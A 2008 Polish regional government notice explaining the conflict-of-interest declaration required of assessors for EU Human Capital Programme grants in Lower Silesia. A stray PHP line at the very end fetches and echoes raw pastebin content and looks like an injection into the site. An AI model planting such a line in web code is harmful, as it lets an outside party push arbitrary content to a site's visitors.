Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

26.08.2008 Nabór na asesorów - wyjaśnienie

Wyjaśnienie Instytucji Pośredniczącej dla komponentu regionalnego PO KL w województwie dolnośląskim dotyczące naboru asesorów prowadzonego w dniach 01-18.08.2008 roku przez Dolnośląski Wojewódzki Urząd Pracy w Wałbrzychu – Instytucję Wdrażającą (Instytucję Pośredniczącą II stopnia)

 

Szanowni Państwo,

 

W związku z pojawiającymi się pytaniami dotyczącymi wymogów stawianych kandydatom na asesorów, zawartych w Zasadach dokonywania wyboru asesorów i ich powoływania do prac w Komisji Oceny Projektów, Instytucja Pośrednicząca dla komponentu regionalnego PO KL w województwie dolnośląskim pragnie wyjaśnić co następuje.

Zgodnie z zapisami Zasad dokonywania wyboru projektów w ramach PO KL (dokumentu programowego PO KL opracowanego przez IZ PO KL), Instytucja Pośrednicząca, poprzez opracowanie jednolitych zasad, zapewnia istnienie przejrzystego i konkurencyjnego naboru asesorów. Wymogi dotyczące kandydatów na asesorów, określone przez IZ PO KL w Zasadach dokonywania wyboru projektów w ramach PO KL, mogą zostać przez IP uszczegółowione.

W województwie dolnośląskim został w ubiegłym roku przeprowadzony częściowy nabór asesorów, dla obszarów: edukacja i zatrudnienie. W tym naborze nie występowało ograniczenie dotyczące miejsca zatrudnienia kandydatów na asesorów – aplikować mogły osoby zatrudnione u podmiotów ubiegających się o dofinansowanie w ramach komponentu regionalnego PO KL.

Jednak wnioski wypływające z analizy utworzonych list asesorów (m.in. to, że wśród kandydatów do pracy w Komisjach Oceny Projektów znalazło się wiele osób będących pracownikami podmiotów, ubiegających się o dofinansowanie projektów w ramach komponentu regionalnego PO KL) skłoniły Instytucję Pośredniczącą do wprowadzenia w Zasadach dokonywania wyboru asesorów i ich powoływania do prac w Komisji Oceny Projektów dodatkowego obostrzenia dotyczącego miejsca zatrudnienia osoby kandydującej do wpisu do rejestru asesorów. Instytucja Pośrednicząca wprowadziła mianowicie wymóg złożenia oświadczenia, że kandydat nie jest pracownikiem podmiotu ubiegającego się o dofinansowanie projektu w ramach komponentu regionalnego PO KL ani pracownikiem podmiotu świadczącego usługi w zakresie opracowania lub pomocy w opracowaniu wniosków o dofinansowanie realizacji projektów w ramach komponentu regionalnego PO KL oraz doradztwa z tym związanego (w obu przypadkach z wyłączeniem projektów systemowych komponentu regionalnego PO KL).

Intencją wprowadzenia takich zapisów było zapewnienie jak największej przejrzystości podczas oceny merytorycznej wniosków o dofinansowanie realizacji projektów. Ze względu na pojawiające się nawet wśród samych beneficjentów w naszym województwie głosy, sugerujące, że ocena wniosków w IOK może nie być wystarczająco przejrzysta i bezstronna, IP pragnęła zapewnić opinię publiczną, że asesorzy, jako osoby uczestniczące w ocenie merytorycznej wniosków o dofinansowanie realizacji projektów, nie będą mieli żadnego interesu w stronniczej ocenie projektów, ponieważ nie uczestniczą w aplikowaniu o środki w naszym województwie – nie tylko w ramach konkretnego konkursu. Co więcej, jako osoby zewnętrzne wobec IOK, pośrednio wpływałyby na zapewnienie opinii publicznej, że ocena wniosków jest rzeczywiście bezstronna, przejrzysta i zgodna ze wszelkimi procedurami. Tym samym IP pragnęła ograniczyć wszelkie spekulacje dotyczące stronniczości podczas oceny merytorycznej wniosków.

Tak więc zamysłem IP nie było wykluczenie z naboru osób posiadających wiedzę o zasadach wdrażania i finansowania projektów w ramach środków pochodzących z EFSNota bene wymóg taki nie znalazł się w dokumencie programowym PO KL przygotowanym przez IZ PO KL (Zasady dokonywania wyboru projektów w ramach PO KL) ani też w dolnośląskich Zasadach dokonywania wyboru asesorów i ich powoływania do prac w Komisji Oceny Projektów.

Zwracam natomiast uwagę, że jeden z zapisów Zasad dokonywania wyboru projektów w ramach PO KL (powielony w dolnośląskich Zasadach dokonywania wyboru asesorów i ich powoływania do prac w Komisji Oceny Projektów) stanowi o minimum dwuletnim doświadczeniu zawodowym kandydata na asesora w dziedzinie objętej programami operacyjnymi współfinansowanymi z Europejskiego Funduszu Społecznego. Nie jest to wymóg doświadczenia w samym aplikowaniu o środki EFS, ale doświadczenia w konkretnej dziedzinie merytorycznej, takiej jak: zatrudnienie, integracja społeczna, adaptacyjność, edukacja, rozwój zasobów ludzkich na obszarach wiejskich. Prawdą jest, że pracownicy podmiotów aplikujących i pomagających w aplikowaniu mogą (choć nie muszą) mieć doświadczenie zawodowe w ww. obszarach, ale założenie, że są to jedyne osoby o takim doświadczeniu, jakie mogłyby kandydować na asesorów, jest uproszczeniem.

Ideą było więc wyłonienie asesorów spośród osób doświadczonych w konkretnym obszarze wsparcia PO KL, niekoniecznie zaś w samym aplikowaniu. Podstawą ku temu były dwa założenia:

  1. występują podmioty, których pracownicy posiadają niezbędną wiedzę merytoryczną i doświadczenie zawodowe w obszarach wsparcia objętych interwencją EFS, z których nie każdy ubiega się o dofinansowanie w ramach komponentu regionalnego PO KL,
  2. osoby posiadające wiedzę i doświadczenie w danym obszarze merytorycznym wymagają przeszkolenia w zakresie zasad aplikowania o środki EFS (jeśli nie dysponują wiedzą w tym zakresie), jest to jednak znacznie prostsze niż wyuczenie osoby nieposiadającej doświadczenia w danej dziedzinie merytorycznej (np. tworzenie i realizacja programów rozwojowych szkół w obszarze edukacji) tak, aby była w stanie ocenić wniosek o dofinansowanie realizacji projektu pod względem merytorycznym.

Dlatego też trudno się zgodzić z głosami, że wprowadzone w województwie wymogi złożenia oświadczeń, że kandydat na asesora nie jest pracownikiem podmiotu ubiegającego się o dofinansowanie projektu w ramach komponentu regionalnego PO KL czy też pracownikiem podmiotu świadczącego usługi w zakresie opracowania lub pomocy w opracowaniu wniosków o dofinansowanie realizacji projektów w ramach komponentu regionalnego PO KL oraz doradztwa z tym związanego (zwłaszcza, że wyłączono spod tego ograniczenia projekty systemowe komponentu regionalnego PO KL), prowadzą do obniżenia jakości oceny merytorycznej wniosków o dofinansowanie realizacji projektów.

Obecnie Komisja powołana przez Dyrektora Dolnośląskiego Wojewódzkiego Urzędu Pracy w Wałbrzychu przystąpiła do oceny kandydatur zgłoszonych w naborze, który trwał w dniach 1 – 18 sierpnia 2008 roku. Jeśli w jej wyniku nie zostanie wyłoniona liczba asesorów, adekwatna do potrzeb oceny merytorycznej wniosków o dofinansowanie realizacji projektów, zostanie przeprowadzony nabór uzupełniający. Na jego potrzeby, zależnie od konkluzji płynących z oceny aktualnie złożonych aplikacji, zasady naboru asesorów będą mogły zostać zmodyfikowane, m.in. w zakresie ww. oświadczeń, jednak w każdym przypadku z zachowaniem minimum wymogów określonego przez IZ PO KL.

 

Z poważaniem,

Wicemarszałek Województwa Dolnośląskiego

Piotr Borys 


<- Wstecz do: Aktualności

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");